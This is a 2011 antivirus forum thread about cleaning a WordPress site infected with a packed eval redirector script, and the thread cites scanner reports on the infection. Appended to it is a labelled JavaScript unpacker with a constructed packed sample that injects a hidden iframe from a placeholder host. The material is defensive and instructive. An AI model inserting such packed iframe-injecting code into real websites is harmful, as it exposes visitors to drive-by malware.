Avast WEBforum
Other => Viruses and worms => Topic started by: pieter_dj on December 10, 2011, 09:13:31 PM
-
My site is -http//www.gadget-talk.com. I have seen the source of my site, but I cannot find the malware script like the people said in this forum in a thread before. What should I do to remove the malware? Help me please. When I browse my site, Avast blocks me and shows that the site is infected with the "JS:Redirector-MR [Trj]" Trojan. Can you give me a step-by-step solution for what to do?
-
Hi, pieter_dj, welcome to the forum :)
The code is embedded in the last line (very long) of the source code of the page.
Look in the middle of the code for the script.
A search for eval( will reveal the embedded code.
Scott
-
From Sucuri...
1. Wordpress internal path: /home/bermain/public_html/gadget-talk.com/wp-content/themes/welding/index.php Wordpress version outdated: Upgrade required.
2. Malware found on javascript file:
hxxp://www.gadget-talk.com/404javascript.js (Just an example, there are many more..!!)
Known Spam detected.
Details: http://sucuri.net/malware/entry/MW:SPAM:SEO
-
Sucuri report malware found here
-http://www.gadget-talk.com/
-http://www.gadget-talk.com/404javascript.js
-http://www.gadget-talk.com/404testpage4525d2fdc
-http://www.gadget-talk.com/about-us/
-http://www.gadget-talk.com/sitemap/
-http://www.gadget-talk.com/contact-us/
-http://www.gadget-talk.com/useful-links/
-http://www.gadget-talk.com/category/apple/
-http://www.gadget-talk.com/category/camera-camcorder/
-http://www.gadget-talk.com/category/cellularphone/
Details: We have many articles about this issue on our blog:
http://blog.sucuri.net/category/spam
wepawet
http://wepawet.iseclab.org/view.php?hash=818126a161566b21f078488d90919a66&t=1323548465&type=js
-
Hi Asyn and Pondus,
Verdict = malicious: http://urlquery.net/report.php?id=11280
See for the second link Pondus gave:
-rcm.amazon.com/e/cm?t=onlineforex06-20&o=1&p=12&l=ur1&category=-amazonwireless&banner=13A670EB10W0N2FZPE02&f=ifr suspicious
[suspicious:2] (ipaddr:72.21.207.5) (iframe) -rcm.amazon.com/e/cm?t=onlineforex06-20&o=1&p=12&l=ur1&category=-amazonwireless&banner=13A670EB10W0N2FZPE02&f=ifr
status: (referer=-www.gadget-talk.com/404javascript.js)saved 2247 bytes 5cdcd519ab333c7e372f364dfa8bb5f38df93348
info: [img] -ecx.images-amazon.com/images/G/01/img10/associates/med-rec/aw-gen-300x250.gif
info: [iframe] -s.amazon-adsystem.com/iu3?d=assoc-amazon.com&rP=
info: [decodingLevel=0] found JavaScript
error: line:3: SyntaxError: missing ) after argument list:
error: line:3: ; function encodeStr(b) { return b && encodeURIComponent(b).replace(/&/g, "&amp;").replace(/"/g, "&quot;").replace(/</g, "&lt;").replace(/>/g, "&gt;"); } document.write("<iframe src="-http:/s.amazon-adsystem.com/iu3?d=assoc-amazon.com&rP=" + encodeStr( ( error: line:3:
could be the response of this now dead?
polonus
-
Yes pol, the OP has to clean up his site..! ;)
-
Why can't I find the script in the source code of the site? I really don't know what to do to delete the code. Could you give me a detailed step-by-step explanation of how to delete the code? If I go to my hosting, which file name do I go to, and where will I find that script so I can delete the code? So what should I do to get rid of this "Dean" issue?
-
A search for eval( will reveal the embedded code.
Highlight the embedded code in spg SCOTT's picture and press delete.
-
Sucuri will do it for you ;)
.....but not for free :-\ http://sucuri.net/signup
-
Isn't it removed?
No, it isn't and I also never said so.
I said that he has to clean it, thought I was clear.
-
Isn't it removed?
No, it isn't and I also never said so.
I said that he has to clean it, thought I was clear.
Didn't see the 'has to' part. :-[
More information about the malware dump: http://sucuri.net/new-malware-evalfunctionpacked.html
-
Can't you give me the steps for how to delete the scripts that contain p,a,c,k,e,r from my site? Please give me the detailed steps, like when I go to my hosting, which folder or file should I go to? Because I am using WordPress. How do I delete that script from the HTML code? I am confused.
-
Again PHP has initially been compromised. Very interesting read link here: http://25yearsofprogramming.com/php/findmaliciouscode.htm (source author: Steven Whitney)
polonus
-
Could you remove that script (modify your post) incase it prompts an alert.
Done, thanks David.
That looks like it *may* be what is adding the code to the pages in the site.
Remove that code (from functions.php), and check all of your pages (html/php/js) files etc. for this eval script.
-
I have removed the original post, to remove suspect code to avoid avast alerting on its own pages.
I have found this in my functions.php file
See image of code example
Can you help me from that code, I should delete the scripts that contains p,a,c,k,e,r from where to where?
-
Should I delete the whole PHP code or only the JavaScript code? Just now I only deleted the JavaScript code. I see it has solved the problem. Or should I delete the PHP code also? What do you think, spg SCOTT and DavidR?
-
do not post code in the forum as avast may alarm on it
-
Again please post any script examples as images not live code, which could cause an alert.
Thank you very much, spg SCOTT. I have removed the code, but I only removed the JavaScript code, not the whole PHP code, so the script now looks like this.
<snip>
Can you check by browsing my site again? I think the problem has been solved, right? I only need to make sure that "Dean Edwards" malware does not appear again each time I browse my site.
-
It seems that the added code in the functions.php was what added the malicious code to the pages as they were created. I can't see the code within the page now.
You also need to ensure that your wordpress version is updated:
From Sucuri...
1. Wordpress internal path: /home/bermain/public_html/gadget-talk.com/wp-content/themes/welding/index.php Wordpress version outdated: Upgrade required.
...
-
I am sorry, I didn't know that the code could make Avast alert on this forum. I apologize. I am curious how to see the code in the source code. Because when I view the source code of my site, I couldn't find that code before I deleted that JavaScript code. I use the Opera browser. I click the View menu and click Source, but I couldn't find the code before I deleted the JavaScript in functions.php. I am curious how you can find the code, spg SCOTT?
-
Hi folks,
When I do a search query on that malcode on http://sucuri.net/new-malware-evalfunctionpacked.html
and go and try to visit: -http://jsunpack.jeek.org/dec/go?report=961a36cb8a1f4c17e1974106b061279928f04583 immediately avast Web Shield blocks connection to it and alerts for as JS:Agent-HA[Trj]
polonus
-
I am sorry, I didn't know that the code could make Avast alert on this forum. I apologize. I am curious how to see the code in the source code. Because when I view the source code of my site, I couldn't find that code before I deleted that JavaScript code. I use the Opera browser. I click the View menu and click Source, but I couldn't find the code before I deleted the JavaScript in functions.php. I am curious how you can find the code, spg SCOTT?
Scott is using a program called Malzilla
-
Avast is right here, see what was reported here: http://blog.armorize.com/2011/10/mass-wordpress-infection-ongoing-most.html link authors Wayne Huang, Chris Hsiao, NightCola Lin.
Quote from there: 1. Location of injected script: in the index page of the compromised website.
2. Means of compromise: we believe via a combination of a) stolen WordPress passwords b) backdoors into previously compromised WordPress websites and c) Automated script-injection tools that work in combination of either (a) or (b).
3. Injected script: In the [Details] section we've included an example of an injected script. There are more than 20 variations.
4. Script packer used: Dean Edwards' packer.
5. Malware: Multiple malware will be installed (dropped) onto the visitors machines without the users' knowledge. Antivirus detection rate is around 5 out of 43 vendors on VirusTotal at the time of this writing.
6. Infected websites: A lot of WordPress websites have been hit, a sample list is as follows:
Now, the way the infection goes, the injection has a simple chain:
1. Index page of a WordPress site is injected with script packed by Dean Edwards' packer
2. Javascript generates iframe to a malicious domain registered with changeip.com
3. Browser loads the exploit pack from the malicious domain, hosting on a few fixed IPs including 95.163.66.209 (Russia), 64.131.75.19 (USA), and 182.18.185.82 (India).
Link authors: Wayne Huang, Chris Hsiao, NightCola Lin at Armorize malware Blog
polonus
-
Avast is right here...
Sure avast! is right, I guess we can all agree on that.
Also read here: http://blog.sucuri.net/2011/09/mass-spam-infection-from-wplinksforwork-com-50k-wordpress-sites-hacked.html
-
Hi Asyn,
Again this shows how important it is for webmasters to continuously update their website software, here WordPress, and initially for them to secure their WordPress passwords, for instance with the Chap Secure Login plug-in, or one could use an online secret key generator: https://api.wordpress.org/secret-key/1.1/salt/
polonus
-
Again this shows how important it is for webmasters to continuously update their website software, here Wordpress...
+1
-
Hi folks, if there is a Dean Edwards packer, there is also an unpacker:
http://dean.edwards.name/unpacker/
Enjoy,
pol
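As an added example (not code from this thread, from Dean Edwards' site, or from Sucuri): a static unpacker for p,a,c,k,e,d output, written in JavaScript since that is what the packer emits. It covers both Scott's "search for eval(" step earlier in the thread and the unpacker link above, but reverses the packer's own decoding loop without ever calling eval, so an injected script can be read instead of run. The packed blob, the page source it sits in, and the host name bad.example are constructed for this example; the trailing `('...',62,14,'...'.split('|'),0,{})` argument shape it parses is the standard one the packer produces.

```javascript
// Added example: static unpacker for Dean Edwards' p,a,c,k,e,d packer.
// Nothing here is executed as code; the packed blob is parsed and decoded.

// Reproduces the packer's e() function: indices are written in a radix of
// up to 62 using 0-9, then a-z, then A-Z, most-significant digit first.
function encodeIndex(c, radix) {
  const head = c < radix ? '' : encodeIndex(Math.floor(c / radix), radix);
  const r = c % radix;
  return head + (r > 35 ? String.fromCharCode(r + 29) : r.toString(36));
}

// Undo the escapes a single-quoted packed literal carries (\' \\ \n \r \t).
function unescapeLiteral(s) {
  let out = '';
  for (let i = 0; i < s.length; i++) {
    if (s[i] !== '\\' || i + 1 >= s.length) { out += s[i]; continue; }
    const n = s[++i];
    out += n === 'n' ? '\n' : n === 'r' ? '\r' : n === 't' ? '\t' : n;
  }
  return out;
}

// The argument list that closes every packer blob:
//   }('<packed>',<radix>,<count>,'<w0|w1|...>'.split('|'),0,{}))
const PACKED_ARGS = /\}\s*\('((?:[^'\\]|\\.)*)'\s*,\s*(\d+)\s*,\s*(\d+)\s*,\s*'((?:[^'\\]|\\.)*)'\.split\('\|'\)\s*,\s*\d+\s*,\s*\{\}\s*\)\)/;

// Returns the original script, or null when the input is not packer output.
function unpackDeanEdwards(blob) {
  const m = PACKED_ARGS.exec(blob);
  if (!m) return null;
  let p = unescapeLiteral(m[1]);
  const radix = parseInt(m[2], 10);
  const count = parseInt(m[3], 10);
  const words = unescapeLiteral(m[4]).split('|');
  // Same loop the packer's own unpacker runs: walk indices from count-1 down
  // to 0 and swap each encoded token back for its word. An empty word means
  // the token already equals its own encoding (e.g. the literal 1 below).
  for (let c = count - 1; c >= 0; c--) {
    if (words[c]) {
      p = p.replace(new RegExp('\\b' + encodeIndex(c, radix) + '\\b', 'g'), () => words[c]);
    }
  }
  return p;
}

// The "search for eval(" step: pull every packer blob out of a page or file
// source. Injections usually sit on one very long line, so a search beats scrolling.
function findPackedEval(source) {
  const found = [];
  const re = /eval\(function\(p,a,c,k,e,[dr]\)/g;
  let m;
  while ((m = re.exec(source)) !== null) {
    const tail = source.slice(m.index);
    const args = PACKED_ARGS.exec(tail);
    if (args) found.push(tail.slice(0, args.index + args[0].length));
  }
  return found;
}

// Constructed sample: a packed script that injects a 1x1 iframe (bad.example
// is a placeholder host, not one from the thread).
const SAMPLE_PACKED =
  "eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\\\b'+e(c)+'\\\\b','g'),k[c])}}return p}('3 0=2.4(\\'5\\');0.6=\\'7://8.9/\\';0.a=1;0.b=1;2.c.d(0);',62,14,'f||document|var|createElement|iframe|src|http|bad|example|width|height|body|appendChild'.split('|'),0,{}))";

// Constructed sample page source with the blob appended as the last line,
// the way the thread describes the injected pages.
const SAMPLE_PAGE = '<html><body><p>Gadget news</p>\n' +
  '<script type="text/javascript">' + SAMPLE_PACKED + '</script></body></html>';

for (const blob of findPackedEval(SAMPLE_PAGE)) {
  console.log(unpackDeanEdwards(blob));
}
```

Run it with node: the loop prints the decoded iframe-injecting script, and `unpackDeanEdwards` returns null for anything that is not packer output. Unpacking shows what the script does; it does not remove it. As the thread found, the server-side code that emits the blob (here the PHP added to functions.php) has to go, every page, PHP and JS file should be re-checked for `eval(`, and WordPress has to be updated so the hole used to plant it is closed.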